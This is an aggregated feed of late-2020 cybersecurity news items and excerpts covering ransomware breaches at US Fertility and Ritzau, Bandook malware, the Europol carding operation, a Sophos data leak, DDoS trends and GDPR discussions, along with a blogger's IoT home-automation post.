The post Canon publicly confirms August ransomware attack and data breach appeared first on Security Affairs.

Digitally Signed Bandook Malware Once Again Targets Multiple Sectors

A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan. Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy "dozens of digitally signed variants" of

Group-IB launches new threat hunting and attack prevention solution

Group-IB has revealed the results of its yearslong development of proprietary high-tech products for threat hunting and research — Threat Intelligence & Attribution and Threat Hunting Framework. Group-IB has become the first company to offer a new type of solution called Threat Intelligence & Attribution. The system is designed to create and customize a cyber threat map for a specific company, correlate individual cybersecurity events in real time, and attribute attacks to a particular threat … More

The post Group-IB launches new threat hunting and attack prevention solution appeared first on Help Net Security.

Attacks are rising in all vectors and types

DDoS, web application, bot, and other attacks have surged exponentially compared to the first half of 2019, according to CDNetworks. In particular, attacks on web applications rose by 800%. These alarming statistics show that enterprises are experiencing challenging times in their attempts to defend against cyber attacks and protect their online assets. Hackers extremely sensitive to industry transformation The report goes on to say that hackers are extremely sensitive to industry transformation. For this reason, … More

The post Attacks are rising in all vectors and types appeared first on Help Net Security.

The current state of third-party risk management

Third-party risk management (TPRM) professionals increasingly do not trust that security questionnaires provide sufficient information to properly understand and act on their third-party risk, according to RiskRecon and Cyentia Institute. As a result, the study found more enterprises are moving towards data-driven third-party risk management programs. Many firms use questionnaires to assess vendor security risk The research, based on a survey of 154 active TPRM professionals, found that 79% of firms have a TPRM program, … More

The post The current state of third-party risk management appeared first on Help Net Security.

Top digital security worries when it comes to remote employees

26% of remote workers have experienced a cyber attack personally, while 45% of employers have asked their employees to use their personal devices for work since the start of the pandemic, according to a Microsoft research. The study surveyed 500 employees and 200 business decision makers in September 2020 about remote working, digital security behaviours, and the worries they now face. Retrofitting cybersecurity The accelerated transition to homeworking is placing pressure on organizations to support … More

The post Top digital security worries when it comes to remote employees appeared first on Help Net Security.

Cyber insurance claims on the rise

External attacks on companies result in the most expensive cyber insurance losses, but it is employee mistakes and technical problems that are the most frequent generator of claims by number, according to a report from Allianz Global Corporate & Specialty (AGCS). The study analyzes 1,736 cyber-related insurance claims worth EUR 660mn (US$ 770mn) involving AGCS and other insurers from 2015 to 2020. “Losses from incidents such as distributed denial of service (DDoS) attacks or phishing … More

The post Cyber insurance claims on the rise appeared first on Help Net Security.

The AI in cybersecurity market to generate $101.8 billion in 2030

The AI in cybersecurity market is projected to generate a revenue of $101.8 billion in 2030, increasing from $8.6 billion in 2019, progressing at a 25.7% CAGR during 2020-2030, ResearchAndMarkets reveals. The market is categorized into threat intelligence, fraud detection/anti-fraud, security and vulnerability management, data loss prevention (DLP), identity and access management, intrusion detection/prevention system, antivirus/antimalware, unified threat management, and risk & compliance management, on the basis of application. The DLP category is expected to … More

The post The AI in cybersecurity market to generate $101.8 billion in 2030 appeared first on Help Net Security.

It’s time to begin optimizing your virtual desktop experience

For companies that were already on the digital track prior to the pandemic, the shift to work-from-home (WFH) accelerated something that was already in progress. Unfortunately, for businesses with no transformation plan, or only a basic one, “going virtual” has been a bit of a scramble. Coming into 2021, this scramble is largely over, and…

The post It’s time to begin optimizing your virtual desktop experience first appeared on IT World Canada.

IoT Unravelled Part 5: Practical Use Case Videos

IoT Unravelled Part 5: Practical Use Case Videos

This is the fifth and final part of the IoT unravelled blog series. Part 1 was all about what a mess the IoT landscape is, but then there's Home Assistant to unify it all. In part 2 I delved into networking bits and pieces, namely IP addresses, my Ubiquiti UniFi gear and Zigbee. Part 3 was all about security and how that's all a bit of a mess too, particularly as it relates to firmware patching and device isolation on networks. Then in part 4 I focussed on the user experience because whilst it's great having all that digitised stuff in the home, it can't degrade the experience of the less technical users of the house.

Now in part 5, let's look at how it all works together, and I've done 11 short videos showing different parts of my house and how the IoT bits work there. If you want to just watch them all back to back, I've put everything in a YouTube playlist embedded here:

Alternatively, you can watch each individual video below complete with some additional commentary about how things work or how I'd do them differently. All these videos are unedited, candid versions of precisely how my house works, enjoy 🙂

Opening the Garage Door Remotely

The original goal of this whole IoT journey! This is enormously useful and not a day goes by where I don't use Apple Home Kit to open the garage door in one way or another. Yesterday morning whilst out Christmas shopping, UniFi Protect popped up on my watch as there was someone at the door. A quick look showed it was the gardeners who normally give advanced notice, but this time showed up unannounced and didn't have access to the property. Over to Home Kit, pop open the garage door, job done!

Playing a Sonos Station with My Watch

This seems like a minor benefit but switching to the station I want via the Sonos app is a bit painful. Open it up, scroll through the favourites, choose the station, sync it to both my Sonos units, set the volume, done. But it's 2 taps on the Apple Watch; one to open the Home Assistant app and a second to "Play ABC Radio". It's the little things like this that I really appreciate.

The Washing Machine Just Finished

Raising alerts when events occur is one of the joys of home automation and whilst I didn't see the value in it at purchase time, having connectivity on the washing machine is actually kinda neat. There's a Samsung SmartThings integration in HA which makes it dead simple to track the washing machine state and let us know once a wash cycle is complete and the clothes are ready to hang on the line.

Is the Coffee Machine Out of Water?

This automation is far more useful than what it probably seems, namely because once the machine is out of water and cools down, there's a quite a lead time to warm back up again. It bugged me, and the solution was simple using the HS110 energy monitoring plugs. I'm using to track a bunch of other things around the house too, it just takes a little tweaking to associate the change in power usage to an event in the appliance you're tracking.

Ring Ring, Ring Ring, There's Someone at the Door

I couldn't wait to get this doorbell in place as it's another piece of the automation puzzle that gets a daily workout. The Ubiquiti UniFi Protect G4 doorbell has an awesome 1080p picture quality and not only does all the stuff in the video, but is also used as a motion sensor to trigger lights should someone walk up to the door after sunset. Plus, it's permanently recording everything and flagging the timeline with events based on motion within predefined zones.

Managing My Office Lights Based on Movement and Stream Deck Buttons

My office lighting was one of the first things I did with home automation as it's continuously changing. I'm writing this with lots of natural light flooding into the room, but later I'll be livestreaming with the curtains closed and 5 artificial lights on, all easily triggered on or off. What I didn't mention in this video is that that lights are only turned on automatically when the light is beneath a certain level; there's no need to automatically turn them on when it's already well lit.

Stair Lights and Kids' Bedroom Lights with Aqara Motion Sensors

The stair lighting is one of the most useful automations in the house and it's another IoT feature we use daily. The kids love their rooms and take great pleasure in showing visitors not just the lights themselves, but how they can ask Alexa to change them to their hearts' desire. I wouldn't do this in our master bedroom, but it's great fun for the kids 😊

Triggering Lights with Ubiquiti UniFi Protect Cameras

The UniFi Protect integration has been fantastic for triggering lights on, especially outdoors where different lights are triggered by movement in different areas. I love this as a security precaution, but do often find a little bit of lag for use in an indoor room where you want the light coming on pretty much immediately when motion appears (although strangely, it performed very well in the video below!)

It's Almost Sunset, Set the Lights

There's just something about coming back to a dark house that feels kinda... lonely. I've put Shellys behind a bunch of the lights both indoors and outdoors to make sure the place always feels welcoming after sunset. Combined with the Aqara button in the video, it's super easy for any family member to either turn them on earlier or turn them off all at once when heading to bed.

The Sun Has Set and the Garage Door is Open

This might seem like a minor one and it's only occasionally triggered as I'm pretty good at keeping the garage door shut, but I really don't want to be going to bed leaving it wide open. A combination of this automation and another Ubiquiti cam pointing at the garage door makes it easy to ensure the place is left how I want it before all the lights go out.

Backlighting Around the TV

I like the backlighting as it makes the black TV pop out from the (very dark blue) wall. I'm not completely happy with the diodes on the Hue being individually visible and would really like a diffuser on them but that said, they're only visible when you're offset from the TV like I am in the video. You only see a nice warm glow when you're directly in front of the TV.

Summary

I hope you've enjoyed this series, it's the culmination of many months of work I've been gradually adding to as I've progressed on my own IoT journey. I think this is a fascinating area of technology that's in its absolute infancy and clearly there are many rough edges to be ironed out. But that's also what makes it exciting, and I'm really looking forward to being more involved in the future of IoT.

Scott Helme and I will be livestreaming a discussion about our IoT journeys later today my time (Friday 27 November), watch for the video below 👇

[embedded video will appear here as soon as we kick off]

Ransomware hits US Fertility the largest US fertility network

US Fertility, the largest network of fertility centers in the U.S., discloses a ransomware attack that took place in September 2020.

US Fertility, the largest network of fertility centers in the U.S., revealed that a ransomware attack hit its systems in September 2020.

The US Fertility (USF) network is comprised of 55 locations across 10 states that completed almost 25,000 IVF cycles in 2018 through its clinics with 130,000 babies have been born.

“On September 14, 2020, USF experienced an IT security event [..] that involved the inaccessibility of certain computer systems on our network as a result of a malware infection,” reads the Notice of Data Security Incident provided by the company.

“Through our immediate investigation and response, we determined that data on a number of servers and workstations connected to our domain had been encrypted by ransomware.”

The company immediately launched an investigation into the incident with the help of third-party forensic experts and notified the law enforcement agencies.

Once identified the impacted systems, the US Fertility took down them and completed the recovery operations on September 20.

Unfortunately, the investigation revealed that threat actors were able to steal a limited number of files containing various types of information for each impacted individual including names, addresses, dates of birth, MPI numbers, and for some individuals Social Security numbers.

The company confirmed that has been working with a specialized team of third-party data auditors to accurately identify the impacted individuals.

“The forensic investigation is now concluded and confirmed that the unauthorized actor acquired a limited number of files during the period of unauthorized access, which occurred between August 12, 2020, and September 14, 2020, when the ransomware was executed,” continues the breach notification.

USF has established a dedicated call center (855-914-4699) to provide information and support to its customers.

“We take this incident very seriously and are committed to protecting the security and confidentiality of health information we gather in providing services to individuals,” said Mark Segal, Chief Executive Officer of USF.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Ransomware hits US Fertility the largest US fertility network appeared first on Security Affairs.

#DTX Cybersecurity Mini Summit: How CISOs Can Transform an Organization’s Cyber-Capabilities

#DTX Cybersecurity Mini Summit: How CISOs Can Transform an Organization’s Cyber-Capabilities

The ways in which CISOs should go about transforming the cybersecurity capabilities of an entire organization was discussed during the DTX Cyber Security Mini Summit by Michael Jenkins MBE, CISO at Brunel University.

Jenkins previously spent a long career in the military including positions in counter-intelligence, and also played a major role in planning security for the 2012 London Olympics. In 2017, he was tasked with turning Brunel University’s cybersecurity capabilities into one of the best in the entire sector, through a five-year strategy. “Ultimately, the goal is taking a business from a low level of maturity in cyber-resilience right the way through to the best in the sector,” he noted.

Around three years into the plan, Jenkins discussed the approach he has taken to try and fulfil this ambitious target. He said the first step was inspiring everyone in the organization, including researchers, staff and students, “to care about data, probably more than the criminal cares to steal it from us.”

This was achieved by engaging in regular conversations with people on campus, helping them to learn about how cyber-criminals operate and “to see that its a very credible goal that we needed to achieve together.” Jenkins added that it was also important for him to understand the work of academics and students at the institution to allow him to “help secure their data in a way that is acceptable to them but is also acceptable to us as a community.” This enables them to understand why particular security measures were in place, and be accepting of it.

The next element was developing the right strategic team and partners, including a small knit of vendors who are well versed with the individual needs of Brunel University and its cybersecurity strategy. This strategy included the development of compartmentalized “safe data havens” and the ability to monitor access control for threats in the network. Jenkins explained: “I had to mould that and balance it to the business that we were – we aren’t a bank, insurer or top end government department, we’re a university, so it’s all about proportionately and sensible risk-based intelligence driven activity.”

Such a capability has now been built, and is leading towards a zero-trust model at the end of the five years. He emphasized how important it has been to ensure everyone understands this end goal, and why it is needed in the face of the threats the university faces. He noted that major universities such as Brunel are a major target of sophisticated threat actors such as organized crime gangs and nation states.

To help get this buy-in from IT staff and the executive board, Jenkins utilizes regular simulated attack exercises to demonstrate just how damaging a successful attack could be. “It all goes back to everybody understanding the why – why do we want to do things this way,” he said. “One of the great things we’ve developed over the last couple of years is providing situational awareness to all our IT practitioners and major leaders and staff in how an attacker enters a network, their lateral movements, how they get the elevated privileges, how they conduct their actions on the objective – the entire end-to-end kill chain.”

There have been many advantages to such simulated exercises, according to Jenkins, and in particular, these are greater buy-in from the staff and board, as well as identifying weaknesses within the business. He added: “It gives confidence to the board that their money is being well spent.”

GDPR Has Had Successes, Requires Public Knowledge of Data Spread

GDPR Has Had Successes, Requires Public Knowledge of Data Spread

The success of the GDPR has been praised, but it is in conflict with the amount of data we create and how we do not consider consent.

Speaking during the Westminster Events Conference on data protection, Dr Subhajit Basu, associate professor of information technology (cyber law) at the University of Leeds and chair of the British and Irish Law Education and Technology Association (BILETA), said while technology drives our lives, the amount of data we create “is growing exponentially.”

He claimed that the number of data protection and privacy laws that have been enacted around the world “is a testament to the importance of data protection globally, or a desire by many countries to qualify trade with the European Union to meet its adequacy requirements.” So after Brexit, the opportunity is there for the UK to become a leading role model for a society empowered by data decisions, but to fulfil this ambition “the UK will have to build a robust legal framework in terms of data protection and cybersecurity.”

The Telecommunications Security bill received its latest reading in the House of Commons this week, and Basu called this “a step in the right direction” as it will propose fines on telcos if they fail to tighten security”, but post Brexit, the UK will need to improve its governance structure for handling data.

“In order to meet this potential, we must find a way to balance the flow of user data, whilst at the same ensuring privacy, security, safety and ethical standards,” he said.

Basu called this a “fundamental” step, as he advocated for a continuation of a strong, user centric data protection law. However, he said that “data governance is just plain complicated” as data protection is often seen as separate from the right to privacy, and the focus is on due process and there are moves to find the best solution.

He went on to say that he has “a lot of faith in the GDPR” as this is the right step towards user empowerment for transparency and control to users when it comes to data sharing. “Data subjects are given more choices on how their information is collected, processed and used,” he said. “But hounding users with more rights means you have a role in protecting their data, but most users continue to hand their over data impatiently, causing this paradox where our concerns are not reflected in our behavior.”

Basu also said he has concerns about “consent in data protection law” as he sees that consent gives an “illusion of control, rather than any meaningful control from a data subject’s point of view.” This is because the process of obtaining consent has become more complicated, and will become more complicated as we move towards using more IoT and AI.

This is also paired with data protection fatigue, as users are asked to read privacy documentations and policy before giving consent and this makes the process tedious. “The sheer number of documents that you need to navigate through is beyond any human capacity,” he said.

He concluded by calling a “lacklustre attitude” to GDPR as being alarming, and pointed at the ICO’s supervisory and adjunct role “without proper demarcation as difficult to accept.”

Danish news agency Ritzau hit by ransomware, but did not pay the ransom

Ritzau, the biggest Danish news agency, was hit by a ransomware attack that brought it offline but refused to pay the ransom.

Ritzau, the biggest Danish news agency, was hit by a ransomware attack that brought it offline. The cyber attack hit a quarter of Ritzau ’s 100 servers that have been damaged. The agency confirmed that it has rejected the ransom demand but did not reveal its amount.

Ritzaus Bureau A/S, or Ritzau for short, is a Danish news agency founded by Erik Ritzau in 1866. It collaborates with three other Scandinavian news agencies to provide Nordic News, an English-language Scandinavian news service.

“Ritzau CEO Lars Vesterloekke couldn’t say how big the ransom demand was because those behind the “professional attack” had left “a file with a message” that the agency didn’t open following instructions from its advisers.” reported the Associated Press.

The news agency has transferred its emergency distribution to clients to six live blogs that provide a better overview.

“If it goes as expected, then we can gradually be back to normal on Thursday,” said Ritzau CEO Lars Vesterloekke Vesterloekke.

The agency launched an investigation into the incident with the help of an external security firm and its insurance company.

At the time of writing the family of ransomware that hit the agency has yet to be revealed, it is also not clear if the threat actors have stolen some data before encrypting the servers.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Danish news agency Ritzau hit by ransomware, but did not pay the ransom appeared first on Security Affairs.

Making your customer experience seamless in an uncertain world

By Nick Alevetsovitis The past six months have brought with them a great deal of change. Many businesses saw major disruptions as they managed the unprecedented impact of the COVID-19 shutdowns. For some, this meant putting non-priority projects on hold. For others, it meant rapidly shifting resources – literally overnight in many cases – to…

The post Making your customer experience seamless in an uncertain world first appeared on IT World Canada.

Defining Codes of Conduct to Enable Post Brexit GDPR Compliance

Defining Codes of Conduct to Enable Post Brexit GDPR Compliance

Harmonization of data protection regulation should still be the aim, despite Brexit, to enable companies to trade across Europe.

Speaking during the Westminster Events Conference on data protection, Chris Combemale, CEO of the Data and Marketing Association, said that since the implementation of GDPR in May 2018, the harmonization of data protection “has been put at risk by data protection authorities across Europe” as they applied the legislation “in radically different ways in each country.”

This can affect customer trust, economic growth and job creation in relation to processing and getting to know customers better.

Combemale said data protection authorities (DPAs) should “apply the role as it is written.”

Looking at the code of conduct for GDPR, which he said was intended for relevant sectors and to achieve harmonization across Europe, in the first instance of “co-regulation” by data protection legislation, Combemale explained: “The logic is that a GDPR code of conduct, operated consistently across 27 or 28 countries, via an industry monitoring body, can provide a consistent interpretation of key aspects of GDPR within an industry sector.”

This would be across industry verticals and different types of businesses, as determined by Article 40 of the GDPR. He said the data and marketing industry has been working hard to achieve clarification of GDPR across Europe, through a combination of an EU code of conduct and national codes of conduct.

This has seen a European code of conduct being produced, while the Austrian DPA has approved a code of conduct for the use of third party data, as approved by the Austrian data and marketing association. The Italian DPA has approved a specific code of conduct for business information services, which is in the process of being approved.

In the UK, he said the Data and Marketing Association is working with the ICO to create a data and marketing code of conduct “including recognition of the existing data and marketing commission as the industry monitoring body.

“All these codes of conduct must reflect GDPR text in way it was written and applied through the lens of sector knowledge and expertise,” he said.

The next step is to understand the scope of business legitimate interests and what that is within the text of GDPR. “We will work hard, using our industry expertise, to ensure all approved data and marketing codes of conduct across Europe and for our industry reflect this,” he said, “in order to understand the harmonization and consistency that was intended by GDPR being a regulation rather than a directive.”

If, in a worst case scenario, the UK is denied data adequacy, he concluded that industry codes of conduct can offer a basis for data transfers.

Cloud IAM and Cloud PAM Challenges Explained

Cloud computing has become a viable solution for companies large and small across all industries. Its accessibility, scalability, reliability, and flexibility are just a few of its benefits, which have led to its widespread adoption. However, although cloud environments primarily bring along a huge amount of advantages, they can also pose cybersecurity risks. Securing sensitive […]

The post Cloud IAM and Cloud PAM Challenges Explained appeared first on Heimdal Security Blog.

Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million

Carding Action 2020 targeted crooks selling/purchasing compromised card data on sites selling stolen cred itcard data and darkweb marketplaces

Group-IB, a global threat hunting and intelligence company, has supported Carding Action 2020 – a cross-border operation led by Europol’s European Cyber Crime Centre (EC3) with the support from law enforcement agencies including The Dedicated Card and Payment Crime Unit of the London Metropolitan and the City of London Police. The three-month anti-cybercrime effort targeted traders of compromised card details and prevented approximately €40 million in losses. 

The details and results of the operation have been presented to the public today by Tobias Wieloch of EC3 at CyberCrimeCon Virtual 2020 – a global threat hunting and intelligence conference, powered by Group-IB.

Carding Action 2020 sought to mitigate and prevent losses for financial institutions and cardholders. During the three-month, Group-IB, the only private-sector cybersecurity company involved in the operation, provided information on approximately 90,000 pieces of recently compromised payment data. This data was obtained and analysed by the company experts thanks to Group-IB’s Threat Intelligence and Attribution system from unique non-public sources, such as botnet and JS-sniffer infrastructure, as well as underground card shops and marketplaces. 

Europol facilitated the coordination and information exchange between law enforcement from Italy, Hungary, the UK and leading card schemes (payment network companies). According to Europol, The Carding Action prevented approximately €40 million in potential losses for mainly European financial institutions, who actioned the data as it was received from the payment providers. The savings were estimated by card schemes looking at the unique cards that were detected and flagged by Group-IB and multiplied by the average spend on those cards. 

All of the 90,000 pieces analysed by Group-IB included full card data – cards compromised via phishing websites, from end devices infected with banking Trojans, as well as by the means of hijacked eCommerce websites and the use of JS-sniffers. According to Group-IB Hi-Tech Crime Trends report 20/21, presented yesterday ta CyberCrimeCon, the carding market grew by 116 percent from $880 mln to $1.9 bln. The expansion of JS-sniffer attacks targeting e-commerce merchants influenced the significant increase of prevented losses.

“Cybercrime can affect all aspects of our daily life, from paying in the supermarket, transferring money to our friends to using online communication tools or Internet of Things devices at home. Cybercriminals can attack us in different ways and this requires a robust response not only from law enforcement but also from the private sector,” said Edvardas Šileris, Head of Europol’s European Cybercrime Centre (EC3). “With more than €40 million in losses prevented, Carding Action 2020 is a great example of how sharing information between private industries and law enforcement authorities is a key in combating the rising trend of e-skimming and preventing criminals from profiting on the back of EU citizens,” he added.

“As cybercriminals know no borders, neither should cooperation in cyberspace,” commented Nicholas Palmer, head of Group-IB global business. “We believe that the ultimate disruption of cybercrime comes from the strong collaboration between industry, international sharing organizations, and law enforcement. The Europol-backed Carding Action was a perfect display of such actions. The speed at which we were able to deliver so many savings would not have been possible without these efforts”. 

Original post at https://www.group-ib.com/media/carding-action-2020/

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services. 

Pierluigi Paganini

(SecurityAffairs – hacking, Carding)

The post Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million appeared first on Security Affairs.

DDoS Attacks Against Online Retailers Increase Four-Fold During Pandemic

DDoS Attacks Against Online Retailers Increase Four-Fold During Pandemic

The number of DDoS attacks targeting e-commerce in Europe has increased four-fold over the last eight months.

According to research by Stormwall, between February and October 2020, the number of DDoS attacks targeted at online retail services quadrupled compared to the same period last year.

It claimed the growth in attack number is primarily contributed to the increased competition between online retailers during the global COVID-19 health crisis, and due to attackers extorting money from businesses. “Cyber-criminals use website downtime as a leverage, promising to stop the attack and restore the service operation, once the victim company pays the ransom,” the company said.

Zach Varnell, senior AppSec consultant at nVisium, said: ““DDoS attacks often go hand-in-hand with ransom notes demanding money to stop the attack. If these ransom notes get paid even at a small fraction of their frequency, DDoS operators will be incentivized to continue such schemes. This sometimes includes making good on their promise to attack those who do not pay up.

“Financial services were originally hit hard by these DDoS ransom threats and for obvious reasons as rich targets for cybercrime. Since there are far more online retailers than financial institutions today, and multiplying in their online presence owing to COVID-19, it is highly likely that targeting this industry is now becoming a lucrative source of ransom threats through DDoS attacks.”

He also pointed out that there are more customers shopping online now and therefore plenty of sensitive customer data to breach and exfiltrate, threatening online retailers who have previously not been security savvy.

Asked if he believed attackers are going after online retailers for financial gain, Brandon Hoffman, CISO at Netenrich, said: “They are 100% following the money. There has been a huge surge of online spending due to COVID-19 and a huge surge in furniture and home remodelling purchases. Many speculate that due to COVID-19, people are not able to take vacations so instead they are spending that budget improving their homes where they are essentially stuck more than normal. Coupled with the closing of physical stores worldwide, this explains the attack focus.”

Stormwall also found the number of attacks on online electronics stores had increased five-fold, the number of attacks on online furniture stores increased by eight-fold, while attacks aimed at online renovation stores grew by seven-fold.

“E-commerce has always been an attractive field to cyber-criminals, and during the pandemic, hackers’ interest in the sector developed even more,” said Ramil Khantimirov, CEO and co-founder of StormWall.

“Criminals are actively advancing the methods of DDoS attacks, and retailers are finding it increasingly difficult to defend against them. This is a serious threat. The new trend is that the attackers are attempting to find vulnerabilities that require a small number of requests per second to make a website unavailable. An effective defense system that can shield against this type of campaign needs to have intelligent DDoS protection, like proactive analysis and self-learning.”

Furthermore, the number of DDoS attacks over the HTTP protocol has risen by 296% between February and September 2020, compared to the same period last year.

AppDynamics the ‘centre’ of Cisco’s push into cloud and SaaS, says its new country manager

Thanks to a front-row seat within Cisco, AppDynamics’ new country manager Rebecca Leach has witnessed the tech giant go from hardware behemoth to hardware behemoth with a promising software portfolio. 

The post AppDynamics the ‘centre’ of Cisco’s push into cloud and SaaS, says its new country manager first appeared on IT World Canada.

Pure Storage expands Pure as-a-Service offerings, unveils new service catalogue

Pure Storage dropped a major expansion of its Pure as-a-Service consumption-based offerings this week, including a new service catalogue providing public cloud levels of price transparency for partners.

The post Pure Storage expands Pure as-a-Service offerings, unveils new service catalogue first appeared on IT World Canada.

Changing Employee Security Behavior Takes More Than Simple Awareness

Designing a behavioral change program requires an audit of existing security practices and where the sticking points are.

Acronis and World Economic Forum Partner to Combat Global Cybercrime

Acronis and World Economic Forum Partner to Combat Global Cybercrime

Cyber-protection firm Acronis has announced that it is collaborating with the World Economic Forum (WEF) Center for Cybersecurity to address rising cybercrime around the globe.

The WEF Center for Cybersecurity is an independent and impartial global platform focused on fostering international dialogues and collaboration to tackle cybersecurity challenges, convening key stakeholders from public and private sectors.

Through the partnership, Acronis will engage in the Cyber-Risk and Corporate Governance project to help establish a baseline understanding of key cybersecurity issues, while providing guidance on strategies for security and cyber-resiliency.

“The Forum’s most recent Global Risk Report noted that the top five global threats were cybersecurity-related, with cyber-attacks and data theft among the most immediate dangers,” said Acronis founder and CEO Serguei “SB” Beloussov. “Having been at the forefront of the new IT discipline of cyber-protection, Acronis brings a unique, comprehensive perspective to the protection challenges facing today’s institutions. By collaborating with our peers, we can ensure business and government leaders have the tools and frameworks needed to meet their cybersecurity obligations of the modern world.”

René Bonvanie, chairman of the board of Acronis, added: “Cybersecurity is critically important in the digital world, yet every day we witness successful breaches. Acronis uniquely offers a cyber-protection platform that natively integrates the five layers of protection into a single offering: prevention, detection, response, recovery and forensics.”

Suspected BEC scammers arrested in Nigeria following year-long Interpol investigation

Three men have been arrested in Nigeria, suspected of being members of an organised cybercrime gang that has targeted over 500,000 government agencies and private sector companies around the world. The group, dubbed TMT by threat researchers at Group-IB, is said to have engaged in attacks against businesses since at least 2017, tricking company employees […]… Read More

The post Suspected BEC scammers arrested in Nigeria following year-long Interpol investigation appeared first on The State of Security.

Sophos notifies data leak after a misconfiguration

The cyber-security firm Sophos is notifying customers via email about a security breach that took place earlier this week.

ZDNet reported that the cyber-security firm Sophos is notifying customers via email about a security breach, the company became aware ot the incident on November 24.

“On November 24, 2020, Sophos was advised of an access permission issue in a tool used to store information on customers who have contacted Sophos Support,” reads the email sent to customers and obtained by ZDNet.

“At Sophos, customer privacy and security are always our top priority. We are contacting all affected customers,” the company said. “Additionally, we are implementing additional measures to ensure access permission settings are continuously secure. “

According to the company, exposed information included customer first and last names, email addresses, and phone numbers (optional).

A Sophos spokesperson revealed that only a “small subset” of the company’s customers were affected. At the time of writing the exact number of affected customers is still unknown.

Sophos became aware of the misconfiguration after it was alerted by a security researcher. The company immediately addressed the issue the same day.

In April, the security firm released an emergency patch to address an SQL injection zero-day vulnerability affecting its XG Firewall product that has been exploited in the wild.

The company investigated the incident and determined that hackers were targeting systems configured with either the administration (HTTPS service) or the User Portal exposed on the WAN zone.

The attackers exploited an SQL injection zero-day vulnerability to gain access to exposed XG devices.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Sophos notifies data leak after a misconfiguration appeared first on Security Affairs.

Automated Monitoring in the Cloud

Glen Hymers of Save The Children International on Implementing a Cloud-First Approach
Glen Hymers, CISO and head of data protection at the U.K.-based charity Save the Children International, says adapting to a cloud-first environment requires extensive security measures, including automated monitoring.